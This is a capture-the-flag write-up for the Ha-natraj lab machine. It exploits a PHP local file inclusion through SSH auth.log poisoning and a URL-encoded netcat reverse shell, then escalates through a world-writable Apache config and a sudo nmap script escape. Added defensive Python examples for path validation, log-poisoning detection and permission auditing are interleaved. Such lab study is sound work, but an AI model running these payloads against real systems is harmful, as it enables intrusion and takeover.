Ha-natraj

This is my write-up for Ha-natraj (see original submission) on OffSec Proving Grounds.

This room is a CTF-style room.

I will try to go into detail on the technical things we do in this room.


1. Enum

  • Let's start up the box and get the IP

Getting the IP

  • Export the IP as a shell variable so it is easier to reuse
export IP=192.168.197.80

## Test to see if the IP is correct
echo $IP
  • Start the port scan
Port Scan
## Create a directory to store the scan results
mkdir nmap

## Start a default nmap scan
nmap -sC -sV -vvv -oN nmap/default_scan $IP

## Start a rustscan for faster all port scan
rustscan -a $IP -- -oN nmap/rustscan $IP
Rustscan result
PORT   STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
  • Since there is a web server running, we can take a look at it and run gobuster to brute-force web directories

Visit website

gobuster dir -u http://$IP/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gob_1.log
## Result
/images (Status: 301) [Size: 315]
/console (Status: 301) [Size: 316]
/server-status (Status: 403) [Size: 278]

2. Foothold

  • Go to http://192.168.197.80/console/file.php?file=/etc/passwd and we can see the content of /etc/passwd; alternatively, we can use curl
curl http://192.168.197.80/console/file.php?file=/etc/passwd
## Result
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
natraj:x:1000:1000:natraj,,,:/home/natraj:/bin/bash
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
mahakal:x:1001:1001:,,,:/home/mahakal:/bin/bash
  • So there is a local file inclusion (LFI) vulnerability: the file parameter is passed straight to the include. Let's find a way to abuse this and turn it into remote code execution
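
The endpoint above hands whatever arrives in the file parameter to the include without any check, which is the whole vulnerability. The following is an added example, not the box's PHP and not from the write-up, of the check a defender would put in front of such an include: resolve the requested name against a fixed base directory, refuse anything that escapes it, and allowlist the file types the page is meant to serve. It is written in Python for clarity; BASE_DIR and ALLOWED_EXTENSIONS are assumed values.

```python
import posixpath
from typing import Optional

# Assumed: the only directory file.php should ever serve from (constructed for this example).
BASE_DIR = "/var/www/html/console/pages"
# Assumed allowlist of page types; .log, .php and extensionless names such as passwd are refused.
ALLOWED_EXTENSIONS = {".txt", ".html"}


def resolve_requested_file(requested: str, base_dir: str = BASE_DIR) -> Optional[str]:
    """Return the absolute path to serve for `requested`, or None if it must be refused.

    Covers both ways the write-up escapes the intended directory: an absolute
    path such as /etc/passwd or /var/log/auth.log, and a relative traversal
    such as ../../etc/passwd.
    """
    if not requested or "\x00" in requested:
        return None  # empty names and NUL-byte truncation tricks are refused outright

    base = posixpath.normpath(base_dir)
    # posixpath.join drops `base` entirely when `requested` is absolute, so an
    # absolute request resolves to itself and then fails the prefix check below.
    candidate = posixpath.normpath(posixpath.join(base, requested))

    if candidate != base and not candidate.startswith(base + "/"):
        return None  # resolved outside the base directory ("/" or ".." escape)
    if posixpath.splitext(candidate)[1] not in ALLOWED_EXTENSIONS:
        return None  # not an allowlisted page type
    return candidate


if __name__ == "__main__":
    for probe in ("about.txt", "/etc/passwd", "../../../../etc/passwd", "/var/log/auth.log"):
        print(f"{probe!r:35} -> {resolve_requested_file(probe)}")
```

Two design points: the check uses pure path arithmetic so it is testable offline, but a production version should also call realpath() on the opened file and repeat the prefix check, so a symlink inside the base directory cannot point back out; and the file should be served with a plain read (readfile in PHP) rather than include, so even a file that slips through is never run through the interpreter, which is what makes the log poisoning later in this write-up possible.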

  • Let's see if we can do some log poisoning

curl http://$IP/console/file.php?file=/var/log/auth.log
## Result
Sep 2 05:09:55 ubuntu sshd[360]: Received signal 15; terminating.
Jun 7 06:30:13 ubuntu systemd-logind[350]: New seat seat0.
Jun 7 06:30:13 ubuntu systemd-logind[350]: Watching system buttons on /dev/input/event0 (Power Button)
Jun 7 06:30:13 ubuntu systemd-logind[350]: Watching system buttons on /dev/input/event1 (AT Translated Set 2 keyboard)
Jun 7 06:30:13 ubuntu sshd[404]: Server listening on 0.0.0.0 port 22.
Jun 7 06:30:13 ubuntu sshd[404]: Server listening on :: port 22.
Jun 7 06:31:02 ubuntu CRON[678]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 7 06:31:02 ubuntu CRON[678]: pam_unix(cron:session): session closed for user root
Jun 7 06:32:01 ubuntu CRON[681]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 7 06:32:01 ubuntu CRON[681]: pam_unix(cron:session): session closed for user root
Jun 7 06:32:44 ubuntu VGAuth[403]: vmtoolsd: Username and password successfully validated for 'root'.
Jul 26 06:56:26 ubuntu systemd-logind[417]: New seat seat0.
Jul 26 06:56:26 ubuntu systemd-logind[417]: Watching system buttons on /dev/input/event0 (Power Button)
Jul 26 06:56:26 ubuntu systemd-logind[417]: Watching system buttons on /dev/input/event1 (AT Translated Set 2 keyboard)
Jul 26 06:56:26 ubuntu sshd[463]: Server listening on 0.0.0.0 port 22.
Jul 26 06:56:26 ubuntu sshd[463]: Server listening on :: port 22.
Jul 26 06:57:01 ubuntu CRON[659]: pam_unix(cron:session): session opened for user root by (uid=0)
Jul 26 06:57:01 ubuntu CRON[659]: pam_unix(cron:session): session closed for user root
Jul 26 06:58:01 ubuntu CRON[662]: pam_unix(cron:session): session opened for user root by (uid=0)
Jul 26 06:58:01 ubuntu CRON[662]: pam_unix(cron:session): session closed for user root
Jul 26 06:58:53 ubuntu VGAuth[454]: vmtoolsd: Username and password successfully validated for 'root'.
Jul 26 06:58:57 ubuntu VGAuth[454]: message repeated 7 times: [ vmtoolsd: Username and password successfully validated for 'root'.]
Jul 26 06:59:01 ubuntu CRON[665]: pam_unix(cron:session): session opened for user root by (uid=0)
Jul 26 06:59:01 ubuntu CRON[665]: pam_unix(cron:session): session closed for user root
Jul 26 06:59:03 ubuntu VGAuth[454]: vmtoolsd: Username and password successfully validated for 'root'.
Dec 5 19:45:10 ubuntu VGAuth[454]: vmtoolsd: Username and password successfully validated for 'root'.
Dec 5 19:45:23 ubuntu VGAuth[454]: message repeated 8 times: [ vmtoolsd: Username and password successfully validated for 'root'.]
Dec 5 19:46:03 ubuntu CRON[890]: pam_unix(cron:session): session opened for user root by (uid=0)
Dec 5 19:46:03 ubuntu CRON[890]: pam_unix(cron:session): session closed for user root
Dec 5 19:47:01 ubuntu CRON[900]: pam_unix(cron:session): session opened for user root by (uid=0)
Dec 5 19:47:01 ubuntu CRON[900]: pam_unix(cron:session): session closed for user root
Dec 5 19:48:01 ubuntu CRON[903]: pam_unix(cron:session): session opened for user root by (uid=0)
Dec 5 19:48:01 ubuntu CRON[903]: pam_unix(cron:session): session closed for user root
Dec 5 19:49:01 ubuntu CRON[906]: pam_unix(cron:session): session opened for user root by (uid=0)
Dec 5 19:49:01 ubuntu CRON[906]: pam_unix(cron:session): session closed for user root
Dec 5 19:49:06 ubuntu sshd[909]: Did not receive identification string from 192.168.49.197 port 58038
Dec 5 19:50:01 ubuntu CRON[910]: pam_unix(cron:session): session opened for user root by (uid=0)
Dec 5 19:50:01 ubuntu CRON[910]: pam_unix(cron:session): session closed for user root
Dec 5 19:51:01 ubuntu CRON[916]: pam_unix(cron:session): session opened for user root by (uid=0)
Dec 5 19:51:01 ubuntu CRON[916]: pam_unix(cron:session): session closed for user root
Dec 5 19:52:01 ubuntu CRON[919]: pam_unix(cron:session): session opened for user root by (uid=0)
Dec 5 19:52:01 ubuntu CRON[919]: pam_unix(cron:session): session closed for user root
Dec 5 19:53:01 ubuntu CRON[922]: pam_unix(cron:session): session opened for user root by (uid=0)
Dec 5 19:53:01 ubuntu CRON[922]: pam_unix(cron:session): session closed for user root
Dec 5 19:54:01 ubuntu CRON[925]: pam_unix(cron:session): session opened for user root by (uid=0)
Dec 5 19:54:01 ubuntu CRON[925]: pam_unix(cron:session): session closed for user root
Dec 5 19:55:01 ubuntu CRON[928]: pam_unix(cron:session): session opened for user root by (uid=0)
Dec 5 19:55:01 ubuntu CRON[928]: pam_unix(cron:session): session closed for user root
Dec 5 19:56:01 ubuntu CRON[931]: pam_unix(cron:session): session opened for user root by (uid=0)
Dec 5 19:56:01 ubuntu CRON[931]: pam_unix(cron:session): session closed for user root
  • Looks like we can read auth.log. Maybe we can poison it with a PHP command and make it call back a shell to us. Let's try
## On our machine try to ssh
ssh '<?php system($_GET['cmd']); ?>'@$IP
The authenticity of host '192.168.197.80 (192.168.197.80)' can't be established.
ED25519 key fingerprint is SHA256:oikisLZJ8r96QhcB1H0OEK18JfSIUhkZ4+MmhbRuA6Y.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.197.80' (ED25519) to the list of known hosts.
<?php system($_GET[cmd]); ?>@192.168.197.80's password:
Permission denied, please try again.
<?php system($_GET[cmd]); ?>@192.168.197.80's password:
  • Using bpython to URL-encode our reverse shell
>>> import urllib.parse
>>> a = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc YOUR_IP YOUR_PORT >/tmp/f"
>>> urllib.parse.quote(a)
'rm%20/tmp/f%3Bmkfifo%20/tmp/f%3Bcat%20/tmp/f%7C/bin/bash%20-i%202%3E%261%7Cnc%20YOUR_IP%20YOUR_PORT%20%3E/tmp/f'
  • To trigger the reverse shell callback, go to this URL
http://$IP/console/file.php?file=/var/log/auth.log&cmd=rm%20/tmp/f%3Bmkfifo%20/tmp/f%3Bcat%20/tmp/f%7C/bin/bash%20-i%202%3E%261%7Cnc%20YOUR_IP%20YOUR_PORT%20%3E/tmp/f
REMEMBER

Change YOUR_IP and YOUR_PORT to your own listener address and port
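
The poisoning above works because sshd writes the attempted login name into auth.log verbatim, and the LFI then feeds that file through the PHP interpreter. Here is an added example, not from the write-up, of detection logic a defender could run over auth.log: it pulls the username out of each sshd "Invalid user" / "Failed password for invalid user" entry and flags any that contain interpreter tags or characters that never appear in a legitimate login name. The sample log lines are constructed for this example (the poisoned entry mirrors what the ssh attempt above would leave behind); the regexes and the marker list are assumptions, not anything the box ships.

```python
import re

# Constructed sample of auth.log lines: benign noise, one normal failed login,
# and the trace a log-poisoning attempt like the one above leaves behind.
SAMPLE_AUTH_LOG = """\
Dec  5 19:49:06 ubuntu sshd[909]: Did not receive identification string from 192.168.49.197 port 58038
Dec  5 19:50:12 ubuntu sshd[931]: Invalid user alice from 192.168.49.197 port 58040
Dec  5 19:50:14 ubuntu sshd[931]: Failed password for invalid user alice from 192.168.49.197 port 58040 ssh2
Dec  5 19:51:30 ubuntu sshd[940]: Invalid user <?php system($_GET[cmd]); ?> from 192.168.49.197 port 58044
Dec  5 19:51:32 ubuntu sshd[940]: Failed password for invalid user <?php system($_GET[cmd]); ?> from 192.168.49.197 port 58044 ssh2
Dec  5 19:52:01 ubuntu CRON[950]: pam_unix(cron:session): session opened for user root by (uid=0)
"""

# Username as sshd writes it: everything between "user " and " from <ip> port <n>".
USERNAME_RE = re.compile(
    r"sshd\[\d+\]: (?:Invalid user|Failed password for invalid user) "
    r"(?P<user>.*?) from (?P<ip>\S+) port (?P<port>\d+)"
)
# Shape of a legitimate login name (assumed: letters, digits, '_', '-', '.', up to 32 chars).
VALID_NAME_RE = re.compile(r"^[a-zA-Z_][a-zA-Z0-9_.-]{0,31}\$?$")
# Interpreter open tags that have no business in a login name.
INJECTION_MARKERS = ("<?php", "<?=", "<?", "<%", "<script")


def find_poisoned_logins(log_text):
    """Return (line_no, username, source_ip, reason) for each suspicious sshd login attempt."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        m = USERNAME_RE.search(line)
        if not m:
            continue  # not a login-attempt line, e.g. CRON or "Did not receive identification"
        user = m.group("user")
        if any(marker in user.lower() for marker in INJECTION_MARKERS):
            findings.append((line_no, user, m.group("ip"), "interpreter tag in username"))
        elif not VALID_NAME_RE.match(user):
            findings.append((line_no, user, m.group("ip"), "non-portable characters in username"))
    return findings


if __name__ == "__main__":
    for line_no, user, ip, reason in find_poisoned_logins(SAMPLE_AUTH_LOG):
        print(f"line {line_no}: {reason}: {user!r} from {ip}")
```

Detection is only a backstop here: the fix is the one from the LFI section (never include a user-chosen file through the interpreter, and never let the web user read /var/log at all). The second, broader rule catches usernames with shell metacharacters or other oddities that are not PHP tags, so it is the one worth tuning against real logs before alerting on it.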

3. PrivEsc

  • After getting the shell, we can upgrade it with python or python3
Upgrade shell
python3 -c 'import pty;pty.spawn("/bin/bash")'   ## use python instead if python3 is not installed

export TERM=xterm
  • See what user www-data can run with sudo on the machine
sudo -l

Matching Defaults entries for www-data on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu:
(ALL) NOPASSWD: /bin/systemctl start apache2
(ALL) NOPASSWD: /bin/systemctl stop apache2
(ALL) NOPASSWD: /bin/systemctl restart apache2
  • After looking around for a while, we will notice that we have write permission on /etc/apache2/apache2.conf
ls -la /etc/apache2/apache2.conf
-rwxrwxrwx 1 root root 7224 Mar 13 2020 /etc/apache2/apache2.conf
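
The weakness here is a root-owned configuration file that anyone can write, paired with a sudo rule that lets the same low-privileged user restart the service that reads it. As an added example (not from the write-up), a small Python audit that flags world-writable or other-executable files among a list of privileged configuration paths; PRIVILEGED_CONFIGS is an assumed list of what to check, and demo() builds a throwaway directory containing a file with the 777 mode found above so the audit runs offline.

```python
import os
import stat
import tempfile

# Assumed: configuration files that should only ever be writable by root (constructed list).
PRIVILEGED_CONFIGS = [
    "/etc/apache2/apache2.conf",
    "/etc/ssh/sshd_config",
    "/etc/sudoers",
]


def classify_mode(mode):
    """Return the list of permission problems for a file whose st_mode is `mode`."""
    problems = []
    if mode & stat.S_IWOTH:
        problems.append("world-writable")          # anyone can rewrite it, as with apache2.conf above
    if stat.S_ISREG(mode) and mode & stat.S_IXOTH:
        problems.append("executable by others")    # a config file never needs an execute bit
    return problems


def audit_files(paths):
    """Return {path: [problems]} for every existing path in `paths` that has a problem."""
    report = {}
    for path in paths:
        try:
            st = os.stat(path)
        except FileNotFoundError:
            continue  # not installed on this host; nothing to audit
        problems = classify_mode(st.st_mode)
        if problems:
            report[path] = problems
    return report


def demo():
    """Audit a throwaway tree with one bad and one sane config; returns {basename: problems}."""
    with tempfile.TemporaryDirectory() as tmp:
        bad = os.path.join(tmp, "apache2.conf")
        good = os.path.join(tmp, "sshd_config")
        for p in (bad, good):
            with open(p, "w") as fh:
                fh.write("# sample config\n")
        os.chmod(bad, 0o777)   # the mode the write-up found on /etc/apache2/apache2.conf
        os.chmod(good, 0o644)  # the mode such a file should have
        report = audit_files([bad, good, os.path.join(tmp, "missing.conf")])
        return {os.path.basename(k): v for k, v in report.items()}


if __name__ == "__main__":
    print("demo:", demo())
    print("this host:", audit_files(PRIVILEGED_CONFIGS))
```

On a real host, run audit_files(PRIVILEGED_CONFIGS) from a cron job or a configuration-management check; the fix for a hit like apache2.conf is chmod 644 and root ownership, and the sudo rule itself should be reviewed, since letting a service account restart the daemon that reads a file it can edit is the second half of this privilege escalation.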
  • With this we can change the User and Group directives in the config file to another user, so when we make the callback we will be that user instead of www-data
cd /tmp

cp /etc/apache2/apache2.conf .

sed -i 's/User ${APACHE_RUN_USER}/User mahakal/g' apache2.conf

sed -i 's/Group ${APACHE_RUN_GROUP}/Group mahakal/g' apache2.conf

cp apache2.conf /etc/apache2/apache2.conf

sudo /bin/systemctl restart apache2
  • After restarting apache2 we will lose our shell, so we need to make the callback again

  • Once again, go back to the URL to trigger the callback

http://$IP/console/file.php?file=/var/log/auth.log&cmd=rm%20/tmp/f%3Bmkfifo%20/tmp/f%3Bcat%20/tmp/f%7C/bin/bash%20-i%202%3E%261%7Cnc%20YOUR_IP%20YOUR_PORT%20%3E/tmp/f
  • Once we are back on the machine, we will see that we are now user mahakal
id
uid=1001(mahakal) gid=1001(mahakal) groups=1001(mahakal)

sudo -l
Matching Defaults entries for mahakal on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mahakal may run the following commands on ubuntu:
(root) NOPASSWD: /usr/bin/nmap
  • Become root with nmap
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF

id
uid=0(root) gid=0(root) groups=0(root)

cat /var/www/local.txt /root/proof.txt
[REDACTED]
[REDACTED]